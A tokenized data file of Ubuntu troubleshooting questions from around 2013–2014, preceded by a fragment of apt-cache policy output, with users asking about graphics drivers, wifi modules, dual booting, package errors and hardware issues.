//ie.archive.ubuntu.com/ubuntu/ saucy-updates/main amd64 packages 100 /var/lib/dpkg/status 1.4.2+20130920-0ubuntu1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages libsystem-command-perl : installed : ( none ) candidate : 1.09-1 version table : 1.09-1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages libboost-system1.42-dev : installed : ( none ) candidate : ( none ) version table : qemu-system : installed : ( none ) candidate : 1.5.0+dfsg-3ubuntu5.3 version table : 1.5.0+dfsg-3ubuntu5.3 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ saucy-security/main amd64 packages 1.5.0+dfsg-3ubuntu5 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages systemtap-doc : installed : ( none ) candidate : 2.2.1-1ubuntu1 version table : 2.2.1-1ubuntu1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages libboost-system1.48-dev : installed : ( none ) candidate : ( none ) version table : lua5.2-filesystem-dev : installed : ( none ) candidate : ( none ) version table : system-config-kickstart : installed : ( none ) candidate : 2.5.20-0ubuntu22 version table : 2.5.20-0ubuntu22 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages live-config-systemd : installed : ( none ) candidate : 3.0.23-1 version table : 3.0.23-1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages systemtap : installed : ( none ) candidate : 2.2.1-1ubuntu1 version table : 2.2.1-1ubuntu1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages libsystemd-login-dev : installed : ( none ) candidate : 204-0ubuntu19.1 version table : 204-0ubuntu19.1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy-updates/main amd64 packages 204-0ubuntu18 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages x-window-system : installed : ( none ) candidate : ( none ) version table : qemu-system-mips64el : installed : ( none ) candidate : ( none ) version table : libsystemu-ruby-doc : installed : ( none ) candidate : 2.5.1-1 version table : 2.5.1-1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages xen-system-amd64 : installed : ( none ) candidate : 4.3.0-1ubuntu1.3 version table : 4.3.0-1ubuntu1.3 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy-updates/universe amd64 packages 500 http : //security.ubuntu.com/ubuntu/ saucy-security/universe amd64 packages 4.3.0-1ubuntu1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages qemu-system-sparc : installed : ( none ) candidate : 1.5.0+dfsg-3ubuntu5.3 version table : 1.5.0+dfsg-3ubuntu5.3 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ saucy-security/main amd64 packages 1.5.0+dfsg-3ubuntu5 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages xen-linux-system-686 : installed : ( none ) candidate : ( none ) version table : gnome-system-log : installed : 3.8.1-1svn1 candidate : 3.8.1-1svn1 version table : *** 3.8.1-1svn1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages 100 /var/lib/dpkg/status libmono-system4.0-cil : installed : ( none ) candidate : 2.10.8.1-5ubuntu2 version table : 2.10.8.1-5ubuntu2 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages libqt5systeminfo5 : installed : ( none ) candidate : 5.0~git20130712-0ubuntu3 version table : 5.0~git20130712-0ubuntu3 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages libmono-system-xml-linq4.0-cil : installed : ( none ) candidate : 2.10.8.1-5ubuntu2 version table : 2.10.8.1-5ubuntu2 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages qtdeclarative5-systeminfo-plugin : installed : ( none ) candidate : 5.0~git20130712-0ubuntu3 version table : 5.0~git20130712-0ubuntu3 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages xen-system-i386 : installed : ( none ) candidate : ( none ) version table : libmono-system-configuration4.0-cil : installed : ( none ) candidate : 2.10.8.1-5ubuntu2 version table : 2.10.8.1-5ubuntu2 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages libboost-system1.53-dev : installed : ( none ) candidate : 1.53.0-6+exp3ubuntu8 version table : 1.53.0-6+exp3ubuntu8 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages qemu-system-m68k : installed : ( none ) candidate : ( none ) version table : qemu-system-mips : installed : ( none ) candidate : 1.5.0+dfsg-3ubuntu5.3 version table : 1.5.0+dfsg-3ubuntu5.3 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ saucy-security/main amd64 packages 1.5.0+dfsg-3ubuntu5 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages libfsosystem-dbg : installed : ( none ) candidate : ( none ) version table : libmono-system-numerics4.0-cil : installed : ( none ) candidate : 2.10.8.1-5ubuntu2 version table : 2.10.8.1-5ubuntu2 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages libmono-system-data-services4.0-cil : installed : ( none ) candidate : 2.10.8.1-5ubuntu2 version table : 2.10.8.1-5ubuntu2 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages qemu-system-i386 : installed : ( none ) candidate : ( none ) version table : qemu-system-misc : installed : ( none ) candidate : 1.5.0+dfsg-3ubuntu5.3 version table : 1.5.0+dfsg-3ubuntu5.3 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ saucy-security/main amd64 packages 1.5.0+dfsg-3ubuntu5 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages libghc-system-filepath-dev : installed : ( none ) candidate : 0.4.7-2build1 version table : 0.4.7-2build1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages
441168	ubuntu 13.10 +amd 13.4 beta drivers . = black screen	hoping for some troubleshoot . fresh install of ubuntu 13.10 . i get into gui for the first time , and run sudo apt-get update sudo apt-get upgrade then i follow this guide : http : //wiki.cchtml.com/index.php/ubuntu_saucy_installation_guide ( replacing the 13.12 driver with the beta ones ) . ( i did the auto install stuff that comes with the beta driver ) . unfortunately on reboot , i am getting a black screen . the first black screen brought me to a place with a cursor that has an `` x '' . switching to ttys is available , but when i click ctrl alt f7 to get into my gui = nada . this is terrible . hopefully someone can help me out . thanks
441169	intel corporation wireless 7260 not working at 12.04	i have been following these instructions : no wireless for intel corporation 7260 version 63 http : //ubuntuforums.org/showthread.php ? t=2176911 however , $ modprobe iwlwifi fatal : error inserting iwlwifi ( /lib/modules/3.5.0-47-generic/updates/drivers /net/wireless/iwlwifi/iwlwifi.ko ) : invalid argument $ uname -mr 3.5.0-47-generic i686 $ lspci -nnk | grep -ia2 net 04:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 10 ) subsystem : lenovo device [ 17aa:5028 ] kernel driver in use : r8169 05:00.0 network controller [ 0280 ] : intel corporation wireless 7260 [ 8086:08b2 ] ( rev 73 ) subsystem : intel corporation wireless-n 7260 [ 8086:4262 ] kernel modules : wl , iwlwifi $ dmesg | grep iwl [ 2757.692284 ] iwlwifi : disagrees about version of symbol ieee80211_channel_to_frequency [ 2757.692286 ] iwlwifi : unknown symbol ieee80211_channel_to_frequency ( err -22 ) [ 3234.875544 ] iwlwifi : disagrees about version of symbol ieee80211_channel_to_frequency [ 3234.875547 ] iwlwifi : unknown symbol ieee80211_channel_to_frequency ( err -22 ) [ 3309.768134 ] iwlwifi : disagrees about version of symbol ieee80211_channel_to_frequency [ 3309.768137 ] iwlwifi : unknown symbol ieee80211_channel_to_frequency ( err -22 ) [ 3598.519141 ] iwlwifi : disagrees about version of symbol ieee80211_channel_to_frequency [ 3598.519148 ] iwlwifi : unknown symbol ieee80211_channel_to_frequency ( err -22 ) [ 3783.357741 ] iwlwifi : disagrees about version of symbol ieee80211_channel_to_frequency [ 3783.357745 ] iwlwifi : unknown symbol ieee80211_channel_to_frequency ( err -22 ) [ 4592.541815 ] iwlwifi : disagrees about version of symbol ieee80211_channel_to_frequency [ 4592.541818 ] iwlwifi : unknown symbol ieee80211_channel_to_frequency ( err -22 )
441171	slow transfer speed from ssd to hdd	i have a lenovo u310 touch laptop . it has an 25gb internal ssd in which i have ubuntu 13.10 installed . when i transfer data from my ssd to my hdd i get very slow speeds , along the lines of 65kb/s . if it helps note that i have my hdd auto-mounted and the entry in the etc/fstab file is uuid=862c5e992c5e83d9 /media/alex/windows8_os ntfs-3g uid=1000 , gid=1000 , umask=0022 , sync , auto , rw 00 . another piece of information is that i have my ssd doing a trim daily . i hope this is enough info and formatted correctly , thanks everyone for the help
441172	recommended values for apt configuration options	to enable automatic updates , we have to edit /etc/apt/apt.conf.d/10periodic and set the appropriate apt configuration options : apt : :periodic : :update-package-lists `` 1 '' ; apt : :periodic : :download-upgradeable-packages `` 1 '' ; apt : :periodic : :autocleaninterval `` 7 '' ; apt : :periodic : :unattended-upgrade `` 1 '' ; what recommended values for these options to security be provided ?
441177	change default user folder paths in xubuntu	how do i change default user folders location in xubuntu ? i have a dropbox , and i keep all my documents and music on it . i want to set it up so that by default all my documents and music in /home/sam/dropbox/documents and /home/sam/dropbox/music .
441182	windows 8 / ubuntu 13.10 in dual boot - how to make grub by default to manage it	good afternoon every . as it 's said in the title , i have windows 8 and ubuntu on my laptop ( efi ) and it boots automatically on windows 8 . to boot on ubuntu , i have to change the boot order with the f9 key . it 's annoying so i want grub manage it , what must i do ?
441183	problem in installing ubuntu 12.04.4 in the desktop	i have tried installing ubuntu 12.04.4-desktop both 64 bit and 32 bit through the usb port using universal usb installer . it is installing fine with no error but after rebooting the system after complete installation , there are black and colored patches only . i have tried installing it 3 times , but it is the same . please help .
441184	new to the ubuntu game any one want to help me with an amd install ?	i guess this may be annoying to some , but if you would like to help . i am definitely not to proud to beg . specs are as follows : amd a4 4000 3.0ghz apu gigabyte f2a55m-hd2 dual bios board . dirt cheap micro-atx case ( surpassingly slick looking though ) . power supply is a 300watt silver stone yada yada sfx type blah . 64gb ssd adata/160 gb 7,200 ( was in my old macbook ) . i had 13.10 semi working internet connected and all , but after trying to update through the terminal , i could n't connect to the net again . i have n't built a machine for linux before , my jobs have supplied me with macs so this is all relatively new stuff for me to learn , so far i love it but i am certainly going to need to spend a lot of time with prophet google ... .
441186	no partitions recognized by ubuntu in trial mode	i recently tried to dual boot my laptop with windows 8 and ubuntu . i disabled the fast startup option in windows 8 and secure boot was also turned off as my model does n't support uefi . now i inserted the usb stick with ubuntu installer and selected 'try ubuntu without installing ' . my problem is that the ubuntu running from usb stick does not recognize any one my existing partitions which i created using windows 8 . further while installing ubuntu 12.04 , the installer shows the entire space as unknown type . any help regarding this problem would be much appreciated . thanks !
441187	openmpi mca parameters does not work	i am trying to setup some of the mca parameters for an mpi execution , the command i am trying to run is : mpirun -- mca btl_base_verbose 30 -- mca btl_tcp_if_include eth1 -nolocal -pernode -machinefile .hostlist -np 3 ./a.out but either btl_base_verbose and btl_tcp_if_include does not produce any effect . any ideas ? thanks ! ubuntu 10.04 x86_64 , openmpi 1.4.3..
441190	miinitializebackingstore , rage m3 and lubuntu 13.10 : screen goes blank	i have installed lubuntu 13.10 on a dell latitude c600 , using the alternate installer . after the initial splash screen , the screen goes blank . after some poking around , i discovered in the /var/log/lightdm/x-0.log the following line : /usr/bin/x : symbol lookup error : /usr/lib/xorg/modules/drivers/r128_drv.so : undefined symbol : miinitializebackingstore searching the web produces many comments about the fact that this entry ( miinitializebackingstore ) is no longer used within x . however , the rage driver that is packaged with lubuntu 13.10 clearly still invokes it . how do i get feedback to the right lubuntu person/group so that the correct driver is incorporated into future distributions ( or a new driver is created without this call ) ? is there any way to get a suitable driver ( i.e. , one that does not invoke miinitializebackingstore ) installed on my latitude ( remembering that i have no working x interface ) . i can access the root shell , but i have no graphical interface . i have a fair amount of experience with linux , but little with *ubuntu .
441191	13.10 fresh install , no sound , no devices listed	running a brand spankin new install of 13.10 and one of the first things i noticed when i first played around is that there was no sound . so naturally i go to the sound icon at the top of the screen and click on it . having used ubuntu before breifly i know there is a program called rhythmbox that is usually there , to the non-existance of it kind of shocked me ( although i know it is installed ) , but that wasnt the big problem . when i opened sound settings i found that there were no outputs no inputs etc ... there was n't even a dummy output , it was literraly just blank . here is some info you may need : http : //www.alsa-project.org/db/ ? f=ec3d4cdfa66dba7aef5c407e1f420f750b8a8d2f -alienware m14x r2 -creative labs sound card thanks in advance
441194	having trouble installing ubuntu phone sdk	i 've been trying to install ubuntu touch development software , and tried installing the packages by trying these two commands : sudo add-apt-repository ppa : ubuntu-sdk-team/ppa as well as sudo apt-get update & & sudo apt-get install ubuntu-sdk after it the shell prints a bunch of outputs , i get these two error messages : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? i also tried using this command with it : sudo apt-get update & & sudo apt-get dist-upgrade but to no avail . i am using a samsung ativ book 7 740u3e laptop , and am running ubuntu through a live disk , which is loaded with ubuntu 13.10 saucy salamander . could the live disk be the problem ? do i need to fully install ubuntu on my system for the sdk to work ? do i need to download anything else before the sdk and ide ? is this normal ?
441195	target 'php5-mysql ' is not a directory error	i 'm trying to get lamp up and running in virtualbox for an assignment i have . i 've installed ubuntu and then apache 2 and php 5 . i 'm using the instructions found here : https : //help.ubuntu.com/community/apachemysqlphp . when i enter the command shown for installing mysql install mysql-server libapache2-mod-auth-mysql php5-mysql i get this error : target 'php5-mysql ' is not a directory . can anyone tell me what i need to do ? thanks !
441196	best format for partition	which format should i use as a storage partition between windows 7 and ubuntu 13.10 ? i 've been trying to change the ownership and permissions and discovered in my research that ntfs partitions are n't fully supported by ubuntu 's permissions software . if this is the case , what format should i change it to ? i understand that will require moving everything off and back on , but i need ownership . thanks , tyler
441197	live usb stuck at syslinux	whenever i try and boot up any distro i get stuck at the syslinux line with a blinking cursor . i know this question has been asked many times before but every answer i found is from years ago , which none seemed to have worked for me , and i’m not sure if their even applicable to newer versions of the distros i 've used . i do n't have access to a cd burner and i ca n't order a disk with a specific distro installed , so this common answer is out of the question for me . i 'm currently running on windows 7 on an acer aspire . i 've tried 5 distros ( ubuntu , zorin , puppy , fedora and mint ) , same outcome in all of them . i’ve tried creating my live usb with unetbootin and pendrive , same outcome and i’ve checked md5sum , everything’s fine . i used 3 different usb sticks , an hp 10 gig , a sandisk 8 gig ( i 've read sandisk usb 's have issues and i’ve tried the fixes for it , still nothing ) , and a 7 gig with a worn off label . i 've tried formatting these stick in fat32 , exfat , and ntfs ( these are the only options i’m given when i format them ) same outcome every time . i 've tried with partitioning my system ( with windows disk manager and again with gparted ) and without partitioning anything , no change , and i cant even get to the point to let ubuntu 's partitioner start up . i used the solution at wont boot from usb , stops at syslinux copyright and ca n't install with usb pen drive , syslinux problem , same results . i have been able to get ubuntu to install using wubi but the 30 gig partition it does is nowhere near enough memory for me . i just want to be able to use my usb to install a distro , i’m not trying to make a persistent usb to carry all my data with it or anything like that . can anybody tell me what i could try next , or what additional info i should try and give ?
441202	how to change min desktop resolution	i 'm trying to use my msi gt70 with my old tablet wacom pl-550 . my problem is that each attempt to install nvidia driver on the laptop resulted in a unbooteable system , and that in current configuration , only 1 screen resolution is available : 1920x1080 . while this resolution is just fine for regular work , on the tablet the image is too distorted to work with properly . so , i used xrandr to add 1200x1000 at 60 hz to possible resolutions . but when i try to switch that resolution on , i get following error message : required virtual size does not fit available size : rexquested= ( 1200,1000 ) , minimum= ( 1920,1080 ) , maximum= ( 1920,1080 ) how can i change minimum avaliable size ?
441203	html5 app not running in ubuntu sdk	today i tried to run just test program in ubuntu sdk . i create a new project and just pressed run button . but it is showing error . and emulator is also not opening . but when i try to open with qml it is working properly . below is the error which i got failed to start program . path or permissions wrong ? ubuntu-html5-app-launcher exited with code -1 what i should do to resolve this .
441205	fans are always running	whenever i turn my laptop on my fans are running as if i was playing a game . the air coming out is cool , none of my computer parts are warm . i am running ubuntu 13.10 and i have a dell inspiron 3521 . thanks to anyone who is willing to help me .
441208	how to change the value of an argument in a script ?	i tried the following small simple script : # ! /bin/bash $ 1= '' bar '' echo $ 1 but when i run ./script foo i get error and the value is not changed : /home/mika/script : line 2 : foo=bar : command not found foo i know $ 1 is the first argument you pass to your script . but even like this i want to change its value .
441209	where can i ask to increase space quota for launchpad ppa ?	i did put an question in launchpad answers but i think there is only one guy active on the help desk of launchpad . where can i ask to increase my ppa space quota ? i 'm newbie & trying to maintain ppa for research & development tools like adt , android studio , gem5 , jppf , scilab etc . i 'm not understanding the problem is it my english , nationality or my color ? btw the link for question on lauchpad is lauchpad question for my ppa ppa : linuxgndu/gajj-sci
441210	format a flash drive to mac os extended ( journaled )	is it even possible to do that on ubuntu ? i need to format it to mac os extended ( journaled ) to install osx and i do n't have a mac available : / could is even install the image with ubuntu ? thanks in advance .
441212	accessing shared folder over network on mac	i have set up a shared folder on ubuntu by right clicking and setting it as a shared folder and also choosing guest access so no logins cause problems . on my mac the ubuntu computer is showing under `` shared '' in the finder . i can click on the computer on finder and then select the shared folder that shows up . i then get an error '' the operation can’t be completed because the original item for “videos” can’t be found . '' is this a problem with the permissions ?
441214	is ubuntu installed with wubi have some differnces from general one	when i install ubuntu with wubi - is it the same if i simply install it ? like disk formatting , etc ? because i need ubuntu for mongodb and need to be sure it will be work as fast as normal one .
441218	logitech k360 keyboard types extra characters on certain keys like the 'n ' key	whenq i turnqed my computer onq today , the keyboard started typinqg extra characters like inq this messed up senqtenqce . the only way to get rid of the extra characters is to highlight them and press delete on the keyboard because pressing backspace just types a backslash which it then deletes . the keys affected are below : pressing 'n ' types 'nq ' , as does pressing 'q' pressing backspace types a backslash , which is then `` backspaced '' pressing 'b ' moves the cursor back to the beginning of the text field . pressing 'z ' types '\z ' , as does pressing '\' pressing ' . ' on the numpad types ' < . ' i am using xubuntu 13.10 , the default drivers , the `` logitech generic keyboard '' layout , and solaar to pair the keyboard with my unifying receiver . the extra characters are also typed in the grub console . it also took me about 20 minutes to type this . update : tried swapping the unifying receivers that came with the mouse i have and the keyboard , did nothing to help .
441228	ubuntu 13.10 empty desktop after any update	i use gnome 3 with nvidia driver . every time i make an update after reboot my desktop is empty . i solve the problem reinstall nvidia driver . so is very frustrating that every time need to reinstall drivers . there is a vay to solve the problem .
441230	apache - configuration to show pdf in browser	there are two behaviors i have seen when it comes to clicking on links pointing to pdf . 1 ) it downloads the pdf ( or asks you where to save it ) 2 ) it displays the pdf it in the browser with an ubuntu lamp server , the default configuration is to download the file . if someone has modified this server setting before , how would i change it so that the pdf is viewed in the browser ?
441231	libre office calc - tables , numbers and formulas ?	i have a lot of numbers located in a table , there are thousands of numbers in there ( 30 columns ă 250 rows ) . i want to know is there any function to find least frequent number/numbers in the whole table ? should i use some function to to that or any other methods ?
441235	how do i reinstall ubuntu 12.10 on my macbook pro 11,3 to avoid problems	i do a lot of scientific programming and data visualization . my intention is to have a mac partition , an ubuntu partition , and a free partition should i choose to install windows 7 later . it would be a bonus to have instructions for that too . after 3 weeks of combing the web and seeing contradictory advice and approaches , i found this thread and links which look like the most promising and in depth analysis : link : askubuntu.com/questions/367254/how-to-upgrade-from-refit-to-refind i have no valuable contents in my current ubuntu partition , so i am planning on starting from scratch . the current issues i am experiencing are : 1 ) refit shows a confusing population of `` bootable '' images despite there being one mac and one linux partition ; 2 ) i believe i installed grub into my ubuntu partition , and it probably was a mistake ; 3 ) when using ubuntu , sometimes the screen will dim and all interaction fails for ten or so seconds , then the screen will brighten again and interaction returns ( bios issue ? ) ; 4 ) i attempted to remove the tiny partition at the end of disk multiple times , but it always returned ( is this the hfs+ partition ? ) . what must work when i finish the reinstall in both osx and ubuntu : 1 ) wireless network ; 2 ) speakers ; 3 ) camera ; 4 ) gpgpu ; 5 ) thunderbolt monitor and network support ; 6 ) suspend/resume with all devices restored ; 7 ) with ubuntu running , shut lid and have exterior apple icon light turn off ; here is my intended course of action : 1 ) destroy all partitions except for the tiny first and last ones and the mac partition ; 2 ) remove refit or preempt it with refind then remove refit ; 3 ) recreate the two partitions ( 1 . windows 100g , 2. ubuntu 128g ) ; 4 ) boot into usb flash with non-mac ubuntu 13.10 . 5 ) then perform installation . but here are web-sites that conflict from which i need to choose instructions : 1 ) link : www.betweendots.com/topic/28-how-to-install-ubuntu-on-a-macbook-pro-retina-2013/ 2 ) link : help.ubuntu.com/community/macbookpro11-1/saucy avoiding grub ; 3 ) link : www.rodsbooks.com/refind/ 3.1 ) link : askubuntu.com/questions/367254/how-to-upgrade-from-refit-to-refind 3.2 ) link : www.rodsbooks.com/linux-uefi/ 3.3 ) link : www.rodsbooks.com/efi-bootloaders/ 3.4 ) link : www.rodsbooks.com/efi-bootloaders/bootrepair.html 3.5 ) link : www.rodsbooks.com/refind/ 3.6 ) link : www.rodsbooks.com/refind/bootmode.html 3.7 ) link : www.rodsbooks.com/refind/using.html number 3 has a deep and careful analysis of refind , part of which i have shown as links . if you were to make an optimal dual boot on my machine , are there any other actions you would suggest ? are there adjustments to the instructions you would make ? i am a bit weak in configuration , and although i 've done a lot of research , i feel i need a helping hand getting this just right . so , here is the question . what is the exact sequence of steps to partition , efi , and install ubuntu such that i avoid all those little gotchas that plagued me for the last few weeks ?
441239	nvidia dvi/vga problem	i have a nvidia gt 630 with two lg flatron e2242 screens connected . one of them is connected with a dvi/vga connector because the card has 1 dvi and 1 vga output . the driver ( got the latest one ) ca n't query the one connected with the dvi/vga connector for its edid and i ca n't get it to work on a resolution bigger than 640x480 . how can i get it to work on 1920x1080 like the other one ?
441240	unable to open software center or update manager	i am current running xubuntu 12.04 64bit . i noticed that i am unable to open the software center or update manager . when i attempt to open the update manager it reports that a problem occurred while checking for updates . upon starting the software center , an error message will appear and tell me failed to execute command `` /usr/bin/software-center % u '' . failed to execute child process `` /usr/bin/software-center '' ( no such file or directory ) running a sudo apt-get upgrade reveals even more problems david @ david-laptop : ~ $ sudo apt-get upgrade [ sudo ] password for david : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 4 not fully installed or removed . need to get 0 b/689 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 575296 files and directories currently installed . ) preparing to replace python-software-properties 0.82.7.7 ( using ... /python-software-properties_0.82.7.7_all.deb ) ... /var/lib/dpkg/info/python-software-properties.prerm : 6 : /var/lib/dpkg/info/python-software-properties.prerm : pyclean : not found dpkg : warning : subprocess old pre-removal script returned error exit status 127 dpkg - trying script from the new package instead ... /var/lib/dpkg/tmp.ci/prerm : 6 : /var/lib/dpkg/tmp.ci/prerm : pyclean : not found dpkg : error processing /var/cache/apt/archives/python-software-properties_0.82.7.7_all.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 127 /var/lib/dpkg/info/python-software-properties.postinst : 6 : /var/lib/dpkg/info/python-software-properties.postinst : pycompile : not found dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 127 preparing to replace software-center 5.2.10 ( using ... /software-center_5.2.10_all.deb ) ... /var/lib/dpkg/info/software-center.prerm : 6 : /var/lib/dpkg/info/software-center.prerm : pyclean : not found dpkg : warning : subprocess old pre-removal script returned error exit status 127 dpkg - trying script from the new package instead ... /var/lib/dpkg/tmp.ci/prerm : 6 : /var/lib/dpkg/tmp.ci/prerm : pyclean : not found dpkg : error processing /var/cache/apt/archives/software-center_5.2.10_all.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 127 /var/lib/dpkg/info/software-center.postinst : 8 : /var/lib/dpkg/info/software-center.postinst : pycompile : not found dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 127 preparing to replace software-properties-common 0.82.7.7 ( using ... /software-properties-common_0.82.7.7_all.deb ) ... /var/lib/dpkg/info/software-properties-common.prerm : 6 : /var/lib/dpkg/info/software-properties-common.prerm : pyclean : not found dpkg : warning : subprocess old pre-removal script returned error exit status 127 dpkg - trying script from the new package instead ... /var/lib/dpkg/tmp.ci/prerm : 6 : /var/lib/dpkg/tmp.ci/prerm : pyclean : not found dpkg : error processing /var/cache/apt/archives/software-properties-common_0.82.7.7_all.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 127 /var/lib/dpkg/info/software-properties-common.postinst : 6 : /var/lib/dpkg/info/software-properties-common.postinst : pycompile : not found dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 127 preparing to replace software-properties-gtk 0.82.7.7 ( using ... /software-properties-gtk_0.82.7.7_all.deb ) ... /var/lib/dpkg/info/software-properties-gtk.prerm : 6 : /var/lib/dpkg/info/software-properties-gtk.prerm : pyclean : not found dpkg : warning : subprocess old pre-removal script returned error exit status 127 dpkg - trying script from the new package instead ... /var/lib/dpkg/tmp.ci/prerm : 6 : /var/lib/dpkg/tmp.ci/prerm : pyclean : not found dpkg : error processing /var/cache/apt/archives/software-properties-gtk_0.82.7.7_all.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 127 no apport report written because maxreports is reached already /var/lib/dpkg/info/software-properties-gtk.postinst : 11 : /var/lib/dpkg/info/software-properties-gtk.postinst : pycompile : not found dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 127 errors were encountered while processing : /var/cache/apt/archives/python-software-properties_0.82.7.7_all.deb /var/cache/apt/archives/software-center_5.2.10_all.deb /var/cache/apt/archives/software-properties-common_0.82.7.7_all.deb /var/cache/apt/archives/software-properties-gtk_0.82.7.7_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ` i am really lost here and any help is appreciated . thanks in advance to whoever can help me
441241	graphics initialization failed on boot from usb stick	loaded 12.04 32bit version onto usb stick and booted onto from my toshiba nb306 with an atom processor and 2 gb ram . got the message : graphics initialization failed error setting up gfxboot boot : _ any ideas ? used to run ubuntu from a desktop app started from windows . is that still available ? thanks , tominill
441242	nautilus fails handling the desktop after upgrading to 13.10	i upgraded to 13.10 a few days ago , since then desktop icons disappear suddenly , each time i have to run nautilus again . how can i track down cause of it ? edit : icons disappear even if an instance of nautilus is open . when i open another instance of nautilus icons show up . edit2 : i think i found the culprit but i still does n't know why . i have wally wallpaper changer , it changes destop background picture periodically , whenever wallpaper changes desktop icons disappear and sometimes nautilus crashes .
441243	bumblebee and lenovo : os crash after ( unsuccesful ) installation	i have been struggling for some days now , and unfortunately not solved the problem : i am trying to install bumblebee on ubuntu ( both 12.04 and 13.10 ) with a lenovo t440p with hybrid graphic cards ( integrated intel ) the result is a pure disaster , the computer just stops working and does not even accept simple commands like sudo poweroff , then the programs crash down and the only way is shutting down brutally and installing ubuntu again . this without any single error message ( depending on the guide followed ) just for your information , lspci | grep vga gives 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) 02:00.0 vga compatible controller : nvidia corporation gk208m [ geforce gt 730m ] ( rev a1 ) i have followed a number of guides , but more or less what i am always doing is following , with some variations depending on the guide : sudo apt-get purge nvidia sudo apt-get update & & sudo apt-get dist-upgrade sudo add-apt-repository ppa : bumblebee/stable sudo add-apt-repository ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get install nvidia-current nvidia-settings sudo add-apt-repository -r ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get install bumblebee bumblebee-nvidia sudo apt-get dist-upgrade i have noted that the laptop has problems after having installed bumblebee . i am also open to alternatives to bumblebee , if there are any . something like primus should do , but as i read through this and other forums it is the pure death ... someone has some suggestions ? what i need is just to run some few program on nvidia , use cuda and the rest on the integrated gpu . i am really sorry if i missed something , but i just passed to ubuntu days ago so forgive any excessive noobness .
441244	the dual boot is not working . ubuntu installed but startup is with win7 only	i have a win 7 laptop . today i installed ubuntu 12.04 on it.. after installation , it asked for restarting the pc . i clicked on `` restart '' . after that there should have been a dual boot option or option to choose between win7 and ubuntu.. but there was no dual boot menu . win 7 start up took place . what to do now ? how can i access ubuntu ? i had installed ubuntu from a usb drive . i had temporarily booted from usb . now how to run ubuntu ? replies are appriciated . : )
441247	terratec cinergy t stick rc mkii is recognized as af9013	my terratec cinergy t stick rc mkii is recognized as af9013 in kaffeine , i think due this i can not access it via kaffeine . p http : //www.linuxtv.org/wiki/index.php/terratec_cinergy_t_usb_rc
441248	problem exporting from shotwell ( imagenes with same name on differents dates )	i have about 1100 pics on shotwell . i need to export all . so i select all , and export them to a folder . the problem is that differents images have the same name and because it was on differents events inside shotwell this is not a problem but when i export them ... it result only in about 800. if i export them in batches of let say ... 100.. it ask sometime if i replace an existing one ... but it does not allow me to give another name ! ( also i suspect it is not asking me on every one ) any ideas ? ? ? thank you very much !
441251	nvidia driver for lg a530-u.be54p1 ( 5466 )	i am trying to install nvidia 's proprietary driver in my laptop : lg a530-u.be54p1 ( 5466 ) i installed it and when i try to log in , it shows the screen in low resolution . after log in , it shows a black screen . my ubuntu version is ubuntu 13.10 . how can i solve it ? which informations do you need to analise it ? thank you !
